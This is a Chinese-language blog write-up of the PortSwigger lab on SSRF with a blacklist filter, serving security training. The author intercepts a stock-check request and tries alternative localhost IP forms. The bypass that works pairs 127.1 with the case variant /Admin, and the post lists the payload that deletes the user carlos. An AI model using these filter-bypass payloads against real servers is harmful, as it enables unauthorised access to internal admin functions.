某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 前言

  • 服务器端主题(翻译)

  • 客户端主题(翻译)

  • 高级主题(翻译)

  • 扩展阅读(翻译)

  • 个人学习笔记

  • 实验室做题记录

    • 实验室做题记录
    • 服务器端

      • SQL注入

      • 身份验证

      • 目录遍历

      • OS命令注入

      • 业务逻辑漏洞

      • 信息泄露

      • 访问控制

      • 文件上传漏洞

      • SSRF漏洞

        • 学徒-基本SSRF-针对服务器自身
        • 学徒-基本SSRF-针对其他后端系统
        • 从业者-绕过常见防御-黑名单过滤器
          • 题目
          • 实操
        • 专家-绕过常见防御-白名单过滤器
        • 从业者-绕过常见防御-开放重定向
        • 从业者-盲SSRF-带外技术
        • 专家-盲SSRF-Shellshock攻击
      • XXE注入漏洞

    • 客户端

    • 高级主题

  • BurpSuite及官方实验室
  • 实验室做题记录
  • 服务器端
  • SSRF漏洞
clincat
2023-07-14
目录

从业者-绕过常见防御-黑名单过滤器

# 实验室:基于黑名单的输入过滤器 中的SSRF

# 题目

此实验室具有库存检查功能,可从内部系统获取数据。

要解决实验室问题,请将库存检查的 URL 更改为http://localhost/admin,以此访问管理界面并删除carlos用户。

开发人员部署了两个脆弱的反 SSRF 防御,你需要绕过它们。

实验室-从业者

基于黑名单的输入过滤器 中的SSRF >>

- name: 实验室-从业者
  desc: 基于黑名单的输入过滤器 中的SSRF >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实操

根据题意,可得实验目标:

  • 找到 库存检查 功能并更改参数的 URL 值,尝试绕过 SSRF 防御,然后访问管理界面并删除 carlos 用户。

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image

来到首页,点击任意商品下方的 “View details” 进入详情页。

Not Found Image

在商品详情页的下方,可以看到一个库存检查功能。

启用浏览器代理,然后点击 “Check stock” 检查库存。

Not Found Image

查看捕获的数据包,在 POST 中存在一个参数stockApi,它直接请求了一个 URL 链接。

Not Found Image

通过 Repeater 功能模块,修改其中的stockApi参数为http://localhost/admin。

访问失败,请求被阻止。

Not Found Image

根据前面学习到的理论知识,使用 IP 地址的第一种替代形式127.1尝试绕过,失败。

http://127.1/admin
1
Not Found Image

使用 IP 地址的 第二种和第三种 替代形式尝试绕过,皆失败。

http://2130706433/admin
http://017700000001/admin
1
2
Not Found Image

随后经过尝试,可以使用 “替代IP形式+大小写变体” 进行绕过。

使用 IP 地址替代形式127.1和大小写变体后的路径/Admin进行绕过,成功访问管理界面。

# 第一种IP变体+路径大小写变体=绕过
http://127.1/Admin


# 以下是失败的尝试
http://localhost/admin
http://127.0.0.1/admin
http://127.0.0.1/Admin
http://127.1/admin
http://2130706433/admin
http://2130706433/Admin
http://017700000001/admin
http://017700000001/Admin
...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Not Found Image

在此过程中,我还尝试了另外两种的 IP 地址替代形式。

地址2130706433,错误的主机名。

Not Found Image

地址017700000001,应用程序无法访问该地址,响应返回 500 状态码。

Not Found Image

最后,访问管理界面用于删除用户的 URL,以删除 carlos 用户。

http://127.1/Admin/delete?username=carlos
1

访问成功。

Not Found Image

回到浏览器页面,实验完成。

Not Found Image
编辑 (opens new window)
学徒-基本SSRF-针对其他后端系统
专家-绕过常见防御-白名单过滤器

← 学徒-基本SSRF-针对其他后端系统 专家-绕过常见防御-白名单过滤器→

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式